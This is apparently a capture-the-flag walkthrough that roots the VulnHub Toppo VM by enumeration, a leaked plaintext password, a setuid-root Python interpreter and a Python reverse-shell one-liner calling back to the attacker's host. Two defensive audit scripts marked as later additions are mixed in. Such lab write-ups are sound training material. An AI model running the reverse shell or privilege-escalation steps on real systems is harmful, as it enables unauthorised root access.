
Toppo

🎃 kr0m

Continuing with my articles on hacking vulnerable VMs, today we will achieve root access on a machine called Toppo. The process is not extremely complex but it has its tricks.

We download the VBox image from VulnHub or alfaexploit:
https://www.vulnhub.com/entry/toppo-1,245/
Toppo.vmdk

We take a look at the offered services:

RX4 ☢ /home/kr0m> nmap -sT 192.168.20.103 -p 0-65535

Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-03 16:46 CEST
Nmap scan report for 192.168.20.103
Host is up (0.00056s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
56149/tcp open  unknown
MAC Address: 08:00:27:52:19:08 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.24 seconds

We launch Nikto to see what it shows us:

RX4 ☢ /home/kr0m/nikto/program> ./nikto.pl -h http://192.168.20.103

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.20.103
+ Target Hostname:    192.168.20.103
+ Target Port:        80
+ Start Time:         2018-09-03 16:48:23 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1925 0x563f5cf714e80
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.25). Apache 2.2.31 is also current for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7796 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2018-09-03 16:48:32 (GMT2) (9 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
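The Nikto findings above (missing hardening headers, a metadata-derived ETag, a version banner and directory indexing) can all be checked offline from a single response. The following audit function is an added example, not code from the write-up or from Nikto; the two sample responses are constructed to mirror the weak target and its hardened counterpart, and the header set it requires is my choice (the two headers still recommended today; X-XSS-Protection is left out on purpose).

```python
"""Audit one HTTP response for the weaknesses Nikto reported above.

Added example, not part of the original write-up. The sample responses below
are constructed to mirror the Nikto findings, not captures from the VM.
"""
import re

# Response headers that should be present on every HTML response; Nikto
# reported both as missing on the target.
REQUIRED_HEADERS = {
    "x-frame-options": "no clickjacking protection",
    "x-content-type-options": "MIME sniffing not disabled",
}

# Apache's metadata-based FileETag values are hex fields joined by '-',
# e.g. "1925-563f5cf714e80"; Nikto reports this style as an inode leak.
APACHE_ETAG = re.compile(r'^(W/)?"[0-9a-f]+(-[0-9a-f]+)+"$', re.I)

# mod_autoindex listings carry this title; it is what "Directory indexing
# found" means in the Nikto output.
AUTOINDEX_TITLE = re.compile(r"<title>\s*Index of /", re.I)


def audit_response(headers, body):
    """Return a list of findings for one response (header names are case-insensitive)."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    for name, why in REQUIRED_HEADERS.items():
        if name not in h:
            findings.append(f"missing {name}: {why}")
    etag = h.get("etag", "").strip()
    if APACHE_ETAG.match(etag):
        findings.append(f"ETag {etag} is derived from file metadata")
    if AUTOINDEX_TITLE.search(body):
        findings.append("directory indexing enabled")
    server = h.get("server", "")
    if re.search(r"/\d+\.\d+", server):
        findings.append(f"Server header discloses version: {server}")
    return findings


# Constructed sample mirroring the weak target: version banner, metadata
# ETag, no hardening headers, and an auto-generated index page.
WEAK_HEADERS = {
    "Server": "Apache/2.4.10 (Debian)",
    "ETag": '"1925-563f5cf714e80"',
    "Content-Type": "text/html;charset=UTF-8",
}
WEAK_BODY = "<html><head><title>Index of /admin</title></head><body></body></html>"

# The same response after hardening the Apache configuration.
HARDENED_HEADERS = {
    "Server": "Apache",
    "Content-Type": "text/html;charset=UTF-8",
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
}
HARDENED_BODY = "<html><head><title>403 Forbidden</title></head><body></body></html>"

if __name__ == "__main__":
    for label, hdrs, body in (("weak", WEAK_HEADERS, WEAK_BODY),
                              ("hardened", HARDENED_HEADERS, HARDENED_BODY)):
        found = audit_response(hdrs, body)
        print(f"[{label}] {len(found)} finding(s)")
        for f in found:
            print("  -", f)
```

On the Apache side the corresponding fixes are `Options -Indexes` for the listed directories, `FileETag None` (or `MTime Size`), `ServerTokens Prod`, and with mod_headers `Header always set X-Frame-Options "DENY"` and `Header always set X-Content-Type-Options "nosniff"`; the hardened sample above is what the audit sees once those are in place.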

Browsing the site in Firefox we find a file called notes.txt in /admin/:

RX4 ☢ /home/kr0m> curl http://192.168.20.103/admin/notes.txt

Note to myself :
I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .

With a little luck we have access:

RX4 ☢ /home/kr0m> ssh ted@192.168.20.103

ted@192.168.20.103's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 15 12:33:00 2018 from 192.168.0.29
ted@Toppo:~$ id
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

We download linuxprivchecker:

wget http://www.securitysift.com/download/linuxprivchecker.py
chmod 700 linuxprivchecker.py

python linuxprivchecker.py

[+] Shadow File (Privileged)
 root:$6$5UK1sFDk$sf3zXJZ3pwGbvxaQ/1zjaT0iyvw36oltl8DhjTq9Bym0uf2UHdDdRU4KTzCkqqsmdS2cFz.MIgHS/bYsXmBjI0:17636:0:99999:7:::
 ted:$6$P3kGAn0I$Yh0kqMyxQUd6wrBkWWZtlN30Xk4/UONrWecpA3D2o5OX12ZdWhdNt45KG0uiX3QlrcAgAFmoYHXbibaGEHkaK/:17777:0:99999:7:::

Is the python script able to dump the shadow without permissions?

ted@Toppo:~$ cat /etc/shadow

cat: /etc/shadow: Permission denied

We keep investigating:

ted@Toppo:~$ ls -la /usr/bin/python

lrwxrwxrwx 1 root root 9 Mar 16 2015 /usr/bin/python -> python2.7
ted@Toppo:~$ ls -la /usr/bin/python2.7
-rwsrwxrwx 1 root root 3889608 Aug 13 2016 /usr/bin/python2.7

That setuid bit is the flaw: once again we see how incorrectly assigned permissions can compromise the entire system.
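A defender's counterpart to the check linuxprivchecker just ran, as an added example that is not from the write-up or from the linuxprivchecker project: it classifies setuid/setgid regular files and ranks an interpreter or writable setuid-root binary, like the /usr/bin/python2.7 above, as critical. The directory list in scan() and the interpreter name set are my assumptions; the two sample entries are constructed from the ls -la output on this page and from a normal passwd binary.

```python
"""Find setuid/setgid files that are interpreters or writable (added example).

Not part of the original write-up. classify() is pure so it can be checked
against constructed (path, mode, uid) tuples; scan() applies it to a live box.
"""
import os
import re
import stat

# Interpreters and shells that give arbitrary code execution: a setuid-root bit
# on any of these is a root shell for every local user (assumed list).
INTERPRETERS = {"python", "perl", "ruby", "bash", "sh", "dash", "zsh",
                "node", "lua", "php"}

# Default directories to walk; an assumption, adjust per distribution.
DEFAULT_ROOTS = ("/usr/bin", "/usr/sbin", "/bin", "/sbin", "/usr/local/bin")


def classify(path, mode, uid):
    """Return a list of flags for one file given its st_mode and st_uid (no I/O)."""
    flags = []
    if not stat.S_ISREG(mode) or not (mode & (stat.S_ISUID | stat.S_ISGID)):
        return flags
    if mode & stat.S_ISUID:
        flags.append("setuid-root" if uid == 0 else "setuid")
    if mode & stat.S_ISGID:
        flags.append("setgid")
    # Strip a version suffix so python2.7 / perl5.30 match the base name.
    name = re.sub(r"[\d.]+$", "", os.path.basename(path))
    if name in INTERPRETERS:
        flags.append("interpreter")
    if mode & stat.S_IWOTH:
        flags.append("world-writable")
    elif mode & stat.S_IWGRP:
        flags.append("group-writable")
    return flags


def severity(flags):
    """An interpreter or writable setuid-root file is critical; other special bits need review."""
    writable = "world-writable" in flags or "group-writable" in flags
    if "setuid-root" in flags and ("interpreter" in flags or writable):
        return "critical"
    if "setuid-root" in flags or "setgid" in flags:
        return "review"
    return "info" if flags else "ok"


def scan(roots=DEFAULT_ROOTS):
    """Walk the directories with lstat (symlinks such as /usr/bin/python are not followed)."""
    findings = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for f in files:
                p = os.path.join(dirpath, f)
                try:
                    st = os.lstat(p)
                except OSError:
                    continue
                flags = classify(p, st.st_mode, st.st_uid)
                if flags:
                    findings[p] = flags
    return findings


# Constructed samples: the -rwsrwxrwx root:root interpreter from the page,
# and an ordinary -rwsr-xr-x root:root passwd binary for comparison.
TOPPO_PYTHON = ("/usr/bin/python2.7", 0o104777, 0)
NORMAL_PASSWD = ("/usr/bin/passwd", 0o104755, 0)

if __name__ == "__main__":
    for path, mode, uid in (TOPPO_PYTHON, NORMAL_PASSWD):
        flags = classify(path, mode, uid)
        print(f"{severity(flags):8} {path} {','.join(flags)}")
    for path, flags in sorted(scan().items()):
        print(f"{severity(flags):8} {path} {','.join(flags)}")
```

The same triage can be done by hand with `find / -perm -4000 -type f 2>/dev/null` and comparing the list with what the distribution ships (a Debian install does not give the Python interpreter the setuid bit); the fix on this box is `chmod u-s /usr/bin/python2.7` and a look at how the bit got there.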

We try to launch a shell from the Python interpreter:

ted@Toppo:~$ python -c "import pty;pty.spawn('/bin/bash')"

bash-4.3$ id

uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
bash-4.3$ cat /etc/shadow
cat: /etc/shadow: Permission denied

The pty shell is still unprivileged because bash, when started with an effective uid that differs from the real uid, resets the effective uid to the real one. Let's try a reverse connection, this time spawning /bin/sh (dash on Debian), which keeps the effective uid:

RX4 ✺ ~> nc -l -p 1234

ted@Toppo:~$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.20.114",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

RX4 ✺ ~> nc -l -p 1234

# id

uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)